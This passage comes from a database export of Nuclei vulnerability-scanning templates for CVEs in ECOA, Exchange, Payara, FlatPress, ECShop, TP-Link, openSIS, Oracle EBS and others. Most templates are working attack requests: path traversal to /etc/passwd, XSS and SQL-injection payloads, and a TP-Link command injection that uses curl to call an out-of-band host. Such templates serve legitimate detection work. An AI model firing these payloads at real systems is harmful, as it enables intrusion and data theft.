Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device; the check below uses the same parameter with a ../ sequence to retrieve /etc/passwd, so arbitrary file retrieval should be assumed as well.\n impact: |\n An attacker can exploit this vulnerability to access sensitive files and directories, potentially exposing sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in the ECOA Building Automation System.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2021-41291\n - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php\n - https://www.twcert.org.tw/en/cp-139-5140-6343c-2.html\n - https://www.twcert.org.tw/tw/cp-132-5127-3cbd3-1.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-41291\n cwe-id: CWE-22\n epss-score: 0.03741\n epss-percentile: 0.90901\n cpe: cpe:2.3:o:ecoa:ecs_router_controller-ecs_firmware:-:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: ecoa\n product: ecs_router_controller-ecs_firmware\n tags: cve2021,cve,ecoa,lfi,traversal\n\nhttp:\n - raw:\n - |\n GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n# digest: 4a0a0047304502207f8b0908b97ff22a89570504251e0836c8b463840c12b998c3766012a1d119a4022100b3627c4c9891d062199b46f969ac720a58088e0472f1ed7e0b44c762688f5cc8:922c64590222798bb761d5b6d8e72950", "hash": "e278ed8eb453b0590e25ceddcca3df1e", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083c3" }, "name": "CVE-2021-41293.yaml", "content": "id: CVE-2021-41293\n\ninfo:\n name: ECOA Building Automation System - Arbitrary File Retrieval\n author: 0x_Akoko\n severity: high\n description: The ECOA BAS controller suffers from an arbitrary file disclosure vulnerability. 
Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the arbitrary file retrieval vulnerability in the ECOA Building Automation System.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2021-41293\n - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php\n - https://www.twcert.org.tw/tw/cp-132-5129-7e623-1.html\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-41293\n cwe-id: CWE-22\n epss-score: 0.05376\n epss-percentile: 0.92942\n cpe: cpe:2.3:o:ecoa:ecs_router_controller-ecs_firmware:-:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: ecoa\n product: ecs_router_controller-ecs_firmware\n tags: cve2021,cve,ecoa,lfi,disclosure\n\nhttp:\n - raw:\n - |\n POST /viewlog.jsp HTTP/1.1\n Host: {{Hostname}}\n\n yr=2021&mh=6&fname=../../../../../../../../etc/passwd\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402201cf6f41a3258c77f1c2a596c881f1d3f0724e938d4f7c03970e59b0c76aa7456022005d47055e3129d39fb98a626771da66a86a32cac9bd81dd969c7b575d3beeacf:922c64590222798bb761d5b6d8e72950", "hash": "512688a17624a2e07f96250eefb36297", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083c4" }, "name": "CVE-2021-41349.yaml", "content": "id: CVE-2021-41349\n\ninfo:\n name: Microsoft Exchange Server Pre-Auth POST Based Cross-Site Scripting\n author: rootxharsh,iamnoooob\n severity: medium\n description: Microsoft Exchange Server is vulnerable to a spoofing vulnerability. 
Be aware this CVE ID is unique from CVE-2021-42305. As exercised by the request below, the issue is a pre-authentication reflected cross-site scripting flaw in which a form-encoded POST body sent to /autodiscover/autodiscover.json is echoed unescaped into a text/html error page returned with HTTP 500, so the injected script comes back verbatim; a response carrying the ASP.NET request-validation message (matched negatively below) means the input was rejected and is not treated as a hit.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, data theft, or other malicious activities. Because the payload travels in a POST body, the victim must be induced to submit it (for example via an attacker-hosted auto-submitting form), which is why the vector records UI:R.\n remediation: |\n Apply the latest security updates provided by Microsoft to mitigate this vulnerability.\n reference:\n - https://www.microsoft.com/en-us/download/details.aspx?id=103643\n - https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-41349\n - https://nvd.nist.gov/vuln/detail/CVE-2021-41349\n - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41349\n - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41349\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N\n cvss-score: 6.5\n cve-id: CVE-2021-41349\n epss-score: 0.96172\n epss-percentile: 0.99474\n cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: microsoft\n product: exchange_server\n tags: cve,cve2021,xss,microsoft,exchange\n\nhttp:\n - raw:\n - |\n POST /autodiscover/autodiscover.json HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n %3Cscript%3Ealert%28document.domain%29%3B+a=%22%3C%2Fscript%3E&x=1\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - 'alert(document.domain);'\n - 'a=\"\"'\n condition: and\n\n - type: word\n part: header\n words:\n - 'text/html'\n\n - type: word\n negative: true\n words:\n - \"A potentially dangerous Request.Form value was detected from the client\"\n\n - type: status\n status:\n - 500\n# digest: 4a0a00473045022100aecde373293992828c4cfbb89e9aaeff35886bd612304c87e362070bf8bfa32f022053555cdc30e1b0aae2d359b107cd5d99f26bbd2c678f6dcb59b7e21b635ea048:922c64590222798bb761d5b6d8e72950", "hash": "d767deb5bd3f93ace5ecd5dfce4f0743", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { 
"$oid": "66477a413521042ccf3083c5" }, "name": "CVE-2021-41381.yaml", "content": "id: CVE-2021-41381\n\ninfo:\n name: Payara Micro Community 5.2021.6 Directory Traversal\n author: pikpikcu\n severity: high\n description: Payara Micro Community 5.2021.6 and below contains a directory traversal vulnerability. As exercised below, prefixing the request path with `/.//` lets an unauthenticated client read files under WEB-INF, which a servlet container is not supposed to serve, for example WEB-INF/classes/META-INF/microprofile-config.properties. The matcher only fires when that file exists and contains the two payara.security.openid settings, so a negative result does not prove the traversal is absent.\n impact: |\n An attacker can access sensitive files on the server, potentially leading to unauthorized disclosure of sensitive information.\n remediation: |\n Upgrade to a Payara Micro Community release later than 5.2021.6 (check the referenced SySS advisory SYSS-2021-054 for the fixed release) or apply the vendor's security patches to mitigate the directory traversal vulnerability.\n reference:\n - https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-054.txt\n - https://nvd.nist.gov/vuln/detail/CVE-2021-41381\n - https://www.payara.fish\n - http://packetstormsecurity.com/files/164365/Payara-Micro-Community-5.2021.6-Directory-Traversal.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-41381\n cwe-id: CWE-22\n epss-score: 0.10127\n epss-percentile: 0.94375\n cpe: cpe:2.3:a:payara:micro_community:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: payara\n product: micro_community\n tags: cve2021,cve,payara,lfi,packetstorm\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/.//WEB-INF/classes/META-INF/microprofile-config.properties\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"payara.security.openid.default.providerURI=\"\n - \"payara.security.openid.sessionScopedConfiguration=true\"\n condition: and\n# digest: 490a00463044022057f649f251cd6b6209745201b3d661f96d0711386c299bb52936b9b9c3889c75022015b8ccd003d9e10a75b53739e4137e586d65760d1566d6669d87aced044185af:922c64590222798bb761d5b6d8e72950", "hash": "4ce3979732e6add41b3dd435c0d25b7d", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083c6" }, "name": "CVE-2021-41432.yaml", "content": "id: CVE-2021-41432\n\ninfo:\n name: 
FlatPress 1.2.1 - Stored Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n FlatPress 1.2.1 contains a stored cross-site scripting vulnerability that allows for arbitrary execution of JavaScript commands through blog content. An attacker can possibly steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the application, leading to potential data theft, session hijacking, or defacement of the website.\n remediation: |\n Upgrade to the latest version of FlatPress (1.2.2) or apply the provided patch to fix the XSS vulnerability.\n reference:\n - https://github.com/flatpressblog/flatpress/issues/88\n - https://nvd.nist.gov/vuln/detail/CVE-2021-41432\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/martinkubecka/CVE-References\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2021-41432\n cwe-id: CWE-79\n epss-score: 0.00067\n epss-percentile: 0.27705\n cpe: cpe:2.3:a:flatpress:flatpress:1.2.1:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 4\n vendor: flatpress\n product: flatpress\n shodan-query: http.html:\"Flatpress\"\n tags: cve2021,cve,flatpress,xss,authenticated,oss,intrusive\n\nhttp:\n - raw:\n - |\n POST /login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykGJmx9vKsePrMkVp\n\n ------WebKitFormBoundarykGJmx9vKsePrMkVp\n Content-Disposition: form-data; name=\"user\"\n\n {{username}}\n ------WebKitFormBoundarykGJmx9vKsePrMkVp\n Content-Disposition: form-data; name=\"pass\"\n\n {{password}}\n ------WebKitFormBoundarykGJmx9vKsePrMkVp\n Content-Disposition: form-data; name=\"submit\"\n\n Login\n ------WebKitFormBoundarykGJmx9vKsePrMkVp--\n - |\n GET /admin.php?p=entry&action=write HTTP/1.1\n Host: 
{{Hostname}}\n - |\n POST /admin.php?p=entry&action=write HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n _wpnonce={{nonce}}&_wp_http_referer=%2Fadmin.php%3Fp%3Dentry%26action%3Dwrite&subject=abcd×tamp=&entry=&attachselect=--&imageselect=--&content=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&save=Publish\n - |\n GET /index.php/2022/10 HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - contains(body_4, '

    ')\n - contains(body_4, 'FlatPress')\n - contains(header_4, 'text/html')\n - status_code_4 == 200\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - name=\"_wpnonce\" value=\"([0-9a-z]+)\" />\n internal: true\n part: body\n# digest: 490a00463044022012ed36398f3a3adcb31e49e199e687115b484c759fd6cd62c37427c20c9e9e6402203afca5bfd1f61846e94feb44fc4487b7653f647f3f710f3d444859f1386a7c58:922c64590222798bb761d5b6d8e72950", "hash": "e84777ca5bd314f5ca20217ac5ad00c5", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083c7" }, "name": "CVE-2021-41460.yaml", "content": "id: CVE-2021-41460\n\ninfo:\n name: ECShop 4.1.0 - SQL Injection\n author: SleepingBag945\n severity: high\n description: |\n ECShop 4.1.0 has SQL injection vulnerability, which can be exploited by attackers to obtain sensitive information.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.\n remediation: |\n Apply the latest patch or upgrade to a newer version of ECShop to mitigate the SQL Injection vulnerability (CVE-2021-41460).\n reference:\n - https://www.cnvd.org.cn/flaw/show/CNVD-2020-58823\n - https://nvd.nist.gov/vuln/detail/CVE-2021-41460\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-41460\n cwe-id: CWE-89\n epss-score: 0.00992\n epss-percentile: 0.83223\n cpe: cpe:2.3:a:shopex:ecshop:4.1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: shopex\n product: ecshop\n fofa-query: product=\"ECShop\"\n tags: cve2021,cve,cnvd,cnvd2020,ecshop,sqli,shopex\nvariables:\n num: \"999999999\"\n\nhttp:\n - raw:\n - |\n POST /delete_cart_goods.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n id=1||(updatexml(1,concat(0x7e,(select%20md5({{num}}))),1))\n\n 
matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'c8c605999f3d8352d7bb792cf3fdb25'\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450221009f97a087872b4e92f17b44312e692cfe4d0f8ec4a6f55166f35bcefacfcff9350220181d6e11e86c111ea5092c9e06badfb85abca47cb28463a32d64be15bf46c207:922c64590222798bb761d5b6d8e72950", "hash": "f0fe1a30fdc875a5fb3e74f2bb49d89c", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083c8" }, "name": "CVE-2021-41467.yaml", "content": "id: CVE-2021-41467\n\ninfo:\n name: JustWriting - Cross-Site Scripting\n author: madrobot\n severity: medium\n description: A cross-site scripting vulnerability in application/controllers/dropbox.php in JustWriting 1.0.0 and below allow remote attackers to inject arbitrary web script or HTML via the challenge parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://github.com/hjue/JustWriting/issues/106\n - https://nvd.nist.gov/vuln/detail/CVE-2021-41467\n - https://github.com/hjue/JustWriting/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-41467\n cwe-id: CWE-79\n epss-score: 0.00133\n epss-percentile: 0.48289\n cpe: cpe:2.3:a:justwriting_project:justwriting:1.0.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: justwriting_project\n product: justwriting\n tags: cve2021,cve,justwriting,xss,justwriting_project\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/sync/dropbox/download?challenge=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - 
\"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502206ceaf43839bf7744044e64e288b4b135c0a9a25f1638c066ee7f2ec6681dc7f4022100e4ea51f58bca51151b2e34e3c43a48ff4a09e9961558ebd344e7e96e23ace169:922c64590222798bb761d5b6d8e72950", "hash": "b96442381c11908d9f24dff0bedc8103", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083c9" }, "name": "CVE-2021-41569.yaml", "content": "id: CVE-2021-41569\n\ninfo:\n name: SAS/Internet 9.4 1520 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: SAS/Internet 9.4 build 1520 and earlier allows local file inclusion. The samples library (included by default) in the appstart.sas file, allows end-users of the application to access the sample.webcsf1.sas program, which contains user-controlled macro variables that are passed to the DS2CSF macro.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Apply the latest security patches or updates provided by SAS to fix the LFI vulnerability in the SAS/Internet 9.4 1520 application.\n reference:\n - https://www.mindpointgroup.com/blog/high-risk-vulnerability-discovery-localfileinclusion-sas\n - https://support.sas.com/kb/68/641.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-41569\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-41569\n cwe-id: CWE-829\n epss-score: 0.0083\n epss-percentile: 0.81604\n cpe: cpe:2.3:a:sas:sas\\/intrnet:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: sas\n product: sas\\/intrnet\n tags: cve2021,cve,sas,lfi\n\nhttp:\n - method: GET\n path:\n - 
\"{{BaseURL}}/cgi-bin/broker?csftyp=classic,+ssfile1%3d/etc/passwd&_SERVICE=targetservice&_DEBUG=131&_PROGRAM=sample.webcsf1.sas&sysparm=test&_ENTRY=SAMPLIB.WEBSAMP.PRINT_TO_HTML.SOURCE&BG=%23FFFFFF&DATASET=targetdataset&_DEBUG=131&TEMPFILE=Unknown&style=a+tcolor%3dblue&_WEBOUT=test&bgtype=COLOR\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022066c668e47e843611630d49691212fcf0c77d83d76e23ee3b0951b7ec4c12eb2a022018dd9e916134bc6f5153f80143e684c17ed9de2d33bd2a74ba0140f345a91820:922c64590222798bb761d5b6d8e72950", "hash": "860e40a5d06893c976563d1d51d5c10f", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083ca" }, "name": "CVE-2021-41648.yaml", "content": "id: CVE-2021-41648\n\ninfo:\n name: PuneethReddyHC action.php SQL Injection\n author: daffainfo\n severity: high\n description: An unauthenticated SQL injection vulnerability exists in PuneethReddyHC Online Shopping through the /action.php prId parameter. 
The value is taken from a POST request and used in a SQL query without sanitization. Note that the NVD text names the parameter prId while the request below sends proId, so verify the exact parameter name against the target's action.php. The matcher relies on a PHP warning (mysqli_num_rows() expecting a result object) being rendered inside an Xdebug xdebug-error element, so targets with error display or Xdebug turned off are not flagged even when vulnerable.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://github.com/MobiusBinary/CVE-2021-41648\n - https://awesomeopensource.com/project/PuneethReddyHC/online-shopping-system\n - https://nvd.nist.gov/vuln/detail/CVE-2021-41648\n - http://packetstormsecurity.com/files/165036/PuneethReddyHC-Online-Shopping-System-Advanced-1.0-SQL-Injection.html\n - https://github.com/nu11secur1ty/Windows10Exploits\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-41648\n cwe-id: CWE-89\n epss-score: 0.06237\n epss-percentile: 0.93438\n cpe: cpe:2.3:a:online-shopping-system-advanced_project:online-shopping-system-advanced:-:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: online-shopping-system-advanced_project\n product: online-shopping-system-advanced\n tags: cve2021,cve,sqli,packetstorm,online-shopping-system-advanced_project\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/action.php\"\n\n body: \"proId=1'&addToCart=1\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: word\n part: body\n words:\n - \"Warning: mysqli_num_rows() expects parameter 1 to be\"\n - \"xdebug-error xe-warning\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220413201af64bc1a1a3d5af7e3f12991972d947be732535eda6ab233b27b11f0cb02205b02cc30b039336e87418c4f197167344c7863ba4811e31206fc8adb2771c217:922c64590222798bb761d5b6d8e72950", "hash": "1c5e98d72d2e22495fa1bb96ef58f5e1", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083cb" }, "name": "CVE-2021-41649.yaml", "content": "id: CVE-2021-41649\n\ninfo:\n name: 
PuneethReddyHC Online Shopping System homeaction.php SQL Injection\n author: daffainfo\n severity: critical\n description: An unauthenticated SQL injection vulnerability exists in PuneethReddyHC Online Shopping System through the /homeaction.php cat_id parameter. Using a post request does not sanitize the user input.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://github.com/MobiusBinary/CVE-2021-41649\n - https://awesomeopensource.com/project/PuneethReddyHC/online-shopping-system\n - https://nvd.nist.gov/vuln/detail/CVE-2021-41649\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-41649\n cwe-id: CWE-89\n epss-score: 0.03607\n epss-percentile: 0.90729\n cpe: cpe:2.3:a:online-shopping-system-advanced_project:online-shopping-system-advanced:-:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: online-shopping-system-advanced_project\n product: online-shopping-system-advanced\n tags: cve2021,cve,sqli,injection,online-shopping-system-advanced_project\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/homeaction.php\"\n\n body: \"cat_id=4'&get_seleted_Category=1\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: word\n part: body\n words:\n - \"Warning: mysqli_num_rows() expects parameter 1 to be\"\n - \"xdebug-error xe-warning\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450221009f9574560b61dd8f4c9aaf234d06646f1519c0fc78e8ff44222e53a558d4259502201e5cfa092c0c0038bc53b925eb4d0270f7fa08ea4008152abad1281e7331b883:922c64590222798bb761d5b6d8e72950", "hash": "aa5bad4137287c8d450a326cfbe6ccec", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": 
"66477a413521042ccf3083cc" }, "name": "CVE-2021-41653.yaml", "content": "id: CVE-2021-41653\n\ninfo:\n name: TP-Link - OS Command Injection\n author: gy741\n severity: critical\n description: The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a specially crafted payload in an IP address input field. The requests below authenticate with the router's default admin:admin credentials (Basic token YWRtaW46YWRtaW4=), so the check only fires on devices that still use them, and the injected host value triggers a curl callback to the interactsh server, so confirmation is out-of-band.\n impact: |\n Successful exploitation of this vulnerability allows arbitrary OS commands to be run on the router (the $(...) substitution placed in the host field below is evaluated on the device), which can lead to unauthorized access, data leakage, and potential compromise of the entire network.\n remediation: Upgrade the firmware to at least version \"TL-WR840N(EU)_V5_211109\".\n reference:\n - https://k4m1ll0.com/cve-2021-41653.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-41653\n - https://www.tp-link.com/us/press/security-advisory/\n - http://tp-link.com\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-41653\n cwe-id: CWE-94\n epss-score: 0.95374\n epss-percentile: 0.99205\n cpe: cpe:2.3:o:tp-link:tl-wr840n_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: tp-link\n product: tl-wr840n_firmware\n tags: cve2021,cve,tplink,rce,router,tp-link\nvariables:\n useragent: '{{rand_base(6)}}'\n\nhttp:\n - raw:\n - |\n POST /cgi?2 HTTP/1.1\n Host: {{Hostname}}\n Content-Type: text/plain\n Referer: http://{{Hostname}}/mainFrame.htm\n Cookie: Authorization=Basic YWRtaW46YWRtaW4=\n\n [IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6\n dataBlockSize=64\n timeout=1\n numberOfRepetitions=4\n host=$(echo 127.0.0.1; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}')\n X_TP_ConnName=ewan_ipoe_d\n diagnosticsState=Requested\n - |\n POST /cgi?7 HTTP/1.1\n Host: {{Hostname}}\n Content-Type: text/plain\n Referer: http://{{Hostname}}/mainFrame.htm\n Cookie: Authorization=Basic YWRtaW46YWRtaW4=\n\n [ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP 
Interaction\n words:\n - \"http\"\n\n - type: word\n part: interactsh_request\n words:\n - \"User-Agent: {{useragent}}\"\n# digest: 490a0046304402205742c2ebff8ce0fc7af74094966181c7ef1dae9ce633a2718335e5010e079d260220194ec4c580b0a470064374d97a3536dc10a47ccc4a195160d4e982e4276ac063:922c64590222798bb761d5b6d8e72950", "hash": "e963b3bcf3c2cb8eda687b42c89c0ea7", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083cd" }, "name": "CVE-2021-41691.yaml", "content": "id: CVE-2021-41691\n\ninfo:\n name: openSIS Student Information System 8.0 SQL Injection\n author: Bartu Utku SARP\n severity: high\n description: openSIS Student Information System version 8.0 is susceptible to SQL injection via the student_id and TRANSFER[SCHOOL] parameters in POST request sent to /TransferredOutModal.php. The check below first logs in through /index.php (the template's payload set supplies a default student/student@123 credential pair) and then sends an error-based updatexml payload in student_id, so it requires a valid account on the target.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.\n remediation: |\n Apply the latest security patch or upgrade to a patched version of openSIS Student Information System to mitigate the SQL Injection vulnerability (CVE-2021-41691).\n reference:\n - https://securityforeveryone.com/blog/opensis-student-information-system-0-day-vulnerability-cve-2021-41691\n - https://www.exploit-db.com/exploits/50637\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41691\n classification:\n cve-id: CVE-2021-41691\n metadata:\n max-request: 2\n tags: cve,cve2021,sqli,auth,edb,opensis\nvariables:\n num: \"999999999\"\n\nhttp:\n - raw:\n - |\n POST /index.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{BaseURL}}\n Content-Type: application/x-www-form-urlencoded\n\n USERNAME={{username}}&PASSWORD={{password}}&language=en&log=\n - |\n POST /TransferredOutModal.php?modfunc=detail HTTP/1.1\n Host: {{Hostname}}\n Origin: {{BaseURL}}\n Content-Type: application/x-www-form-urlencoded\n\n 
student_id=updatexml(0x23,concat(1,md5({{num}})),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5\n\n attack: pitchfork\n payloads:\n username:\n - student\n password:\n - student@123\n matchers:\n - type: dsl\n dsl:\n - 'contains(body_2, \"'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022077a908cc0f84943d99a897323cdeb2899210c5a6cd3d08634c62ced31283feeb022100a8428c5469152520da4ec621970240d45755a2c602d099e22dce986d12653785:922c64590222798bb761d5b6d8e72950", "hash": "e532650b408d50177b1becdc348d8568", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308491" }, "name": "CVE-2022-21587.yaml", "content": "id: CVE-2022-21587\n\ninfo:\n name: Oracle E-Business Suite 12.2.3 -12.2.11 - Remote Code Execution\n author: rootxharsh,iamnoooob,pdresearch\n severity: critical\n description: |\n Oracle E-Business Suite 12.2.3 through 12.2.11 is susceptible to remote code execution via the Oracle Web Applications Desktop Integrator product, Upload component. 
An attacker with HTTP network access can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n remediation: |\n Apply the necessary security patches provided by Oracle to mitigate this vulnerability.\n reference:\n - https://blog.viettelcybersecurity.com/cve-2022-21587-oracle-e-business-suite-unauth-rce/\n - https://www.oracle.com/security-alerts/cpuoct2022.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-21587\n - http://packetstormsecurity.com/files/171208/Oracle-E-Business-Suite-EBS-Unauthenticated-Arbitrary-File-Upload.html\n - https://github.com/manas3c/CVE-POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-21587\n cwe-id: CWE-306\n epss-score: 0.97315\n epss-percentile: 0.99868\n cpe: cpe:2.3:a:oracle:e-business_suite:*:*:*:*:*:*:*:*\n metadata:\n max-request: 3\n vendor: oracle\n product: e-business_suite\n tags: cve,cve2022,intrusive,ebs,unauth,kev,rce,oast,oracle,packetstorm\n\nhttp:\n - raw:\n - |\n POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv\n\n ------WebKitFormBoundaryZsMro0UsAQYLDZGv\n Content-Disposition: form-data; name=\"bne:uueupload\"\n\n TRUE\n ------WebKitFormBoundaryZsMro0UsAQYLDZGv\n Content-Disposition: form-data; name=\"uploadfilename\";filename=\"testzuue.zip\"\n\n begin 664 test.zip\n M4$L#!!0``````\"]P-%;HR5LG>@```'H```!#````+BXO+BXO+BXO+BXO+BXO\n M1DU77TAO;64O3W)A8VQE7T5\"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.\n M1%=24BYP;'5S92!#1TD[\"G!R:6YT($-'23HZ:&5A9&5R*\"`M='EP92`]/B`G\n 